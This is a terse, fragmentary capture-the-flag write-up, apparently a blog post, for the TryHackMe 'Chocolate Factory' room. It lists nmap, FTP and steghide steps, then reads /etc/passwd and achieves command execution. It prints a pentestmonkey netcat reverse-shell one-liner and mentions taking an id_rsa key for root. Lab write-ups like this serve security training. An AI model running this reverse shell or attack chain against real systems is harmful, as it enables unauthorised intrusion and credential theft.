Chocolate Factory | THM

nmap -sV -sC machine_IP

get file_name.png /local directory/filename.png

getting file from FTP using get command

steghide extract -sf file_name

we got /etc/passwd file
Here We can see command execution can be performed

This reverse_shell script was taken from pentestmonkey

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

We got hold of id_rsa key
Executing root.py

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store